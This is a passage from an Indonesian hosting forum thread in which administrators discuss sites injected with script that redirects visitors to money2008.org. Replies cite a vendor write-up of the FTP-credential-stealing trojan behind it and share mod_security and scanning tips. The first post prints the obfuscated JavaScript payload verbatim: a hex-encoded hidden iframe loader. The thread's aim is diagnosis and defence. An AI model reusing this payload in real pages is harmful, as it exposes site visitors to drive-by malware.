money2008.org


Status
Not open for further replies.

PusatHosting

Hosting Guru
oh ya beberapa waktu lalu ada 1 situs yang saya kelola dan 1 situs kawan saya terkena injeksi kelihatanya sejenis malware script, dari AVG dikenal sebagai JS/Downloader. ciri-cirinya setiap kali load musti akses domain money2008.org

parahnya situs kawan saya tersebut sampai dibanned google /stopbadware.org karena dianggap melakukan host pada malware tsb untungnya setelah report jangka 2 hari bisa kembali normal.

scriptya berikut

//ke83jcnsWWdo403
<script type=\"text/javascript\">\r\nfunction

CC70475059E00529BB593C9C20A(B8F4CAE98748092E8E6367F05FCF){function

C1826F692BFD1CF8913C37(){return

16;}return(parseInt(B8F4CAE98748092E8E6367F05FCF,C1826F692BFD1CF8913C37()));}function

B07B56FF7E3F2F514C65E(A580CA29C93E1C0E53A06693ABB){var CB9AED6DBA318389BBCCF9498DF22=2;var

C32DC468C68BC65AF2A58AE9E4BAC=\"\";for(B5D436DCF02E51628012=0;B5D436DCF02E51628012<A580CA29C93E1

C0E53A06693ABB.length;B5D436DCF02E51628012+=CB9AED6DBA318389BBCCF9498DF22){C32DC468C68BC65AF2A58

AE9E4BAC+=(String.fromCharCode(CC70475059E00529BB593C9C20A(A580CA29C93E1C0E53A06693ABB.substr(B5

D436DCF02E51628012,CB9AED6DBA318389BBCCF9498DF22))));}document.write(C32DC468C68BC65AF2A58AE9E4B

AC);}B07B56FF7E3F2F514C65E(\"3C696672616D65207372633D22687474703A2F2F6D6F6E6579323030382E6F72672

F746D702F222077696474683D31206865696768743D31207374796C653D227669736962696C6974793A68696464656E3

B706F736974696F6E3A6162736F6C757465223E3C2F696672616D653E\");\r\n</script>

simpan dalam file format .html dll maka akan dikenali sbg JS/downloader oleh AVG

apa ada yang pernah mendapati masalah serupa dengan saya ini?
 
Last edited:

die_gepetto

New Member
Sama!

sama persis...!
saya juga mengalami kejadian serupa di web klien dan web pribadi saya sendiri, lebih parah lagi web klien saya sudah di blok oleh stopbadware.org :mad:

ada solusi?
 

whatthahell

Poster 2.0
saya belum dapet laporan dari client ttg ini.

sejak baca post ini, mod_sec saya perketat pakai rules dari gotroot dot com.
Banyak yang terfilter, tapi banyak juga false positive ( menurut presepsi saya ).

Rules ga dipakai semua karena sangat memberatkan apache, cuman saya pilih yang kira2 efektif.

kalau nanti ada yang pakai juga, mari diskusi tentang rules yang efektif dan yang false positive.
 

rendy

Hosting Guru
Verified Provider
ini jawabannya

Overview -

PWS-FerTP is a Trojan that attempts to steal FTP account details on infected machines and posts them to a remote server. It also injects malicious HTML code in HTML and PHP scripts found on FTP repositories.
Characteristics
Characteristics -

When executed, PWS-FerFTP retrieves FTP account details saved by the following applications, if installed:

* FAR Manager
* GlobalScape CuteFTP
* Ghisler Total Commander

It also switches the first network adapter found to promiscuous mode and save every FTP account transiting through the network.

PWS-FerFTP connects to each FTP account and looks for files whose name is in the following list:

* index.htm
* main.htm
* default.htm
* index.php
* main.php
* default.php

When such a file is found, PWS-FerTP inserts an IFRAME HTML tag redirecting users to money2008.org.

It also creates the following mutex to ensure on one instance of the trojan is active on the infected system:

* i_iut7gtjuhj221v2

PWS-FerTP adds the following two values in the Windows registry:

* HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List
"<PROGRAM_PATH>" = "<PROGRAM_PATH>:*:Enabled:ipsec"
* HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
“GlobalUserOffline” = “0x0”

Symptoms
Symptoms -

Unexpected FTP and HTTP access.
Presence of the registry keys described above.
Method of Infection
Method of Infection -

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email, etc.
 

whatthahell

Poster 2.0
bisa di cari dengan command find, bisa juga pakai script.

masukkan sebagian pattern 'penyakit' ke variable sploitpattern.

Yang dibawah ini sesuaikan saja dengan kondisi

searchpath=/home
sploitdir=/<your_location>/sploitfind


command untuk eksekusinya

#sh sploitFinder.sh -ac -m [email protected]



Paling tidak, sebagai administrator server bisa cepet deteksi keberadaan script js itu, dan bisa advice ke client dan biar ga keduluan gugle:)

note: script ini cuman untuk cari website yang sudah terinject, keterangan lengkap ada dalam kemasan (eh dalem script nya). saya baru coba run as root, belum dicoba sebagai user.


Kredit buat yang bikin script (lupa namanya)
 

Attachments

  • sploitFinder.sh.txt
    10.6 KB · Views: 7
Last edited:

rendy

Hosting Guru
Verified Provider
sbenernya lebih baik didownload terus di scan dan di upload lagi,

solusi terbaik adalah tidak mempergunakan windows,

he he he
 
Status
Not open for further replies.

Top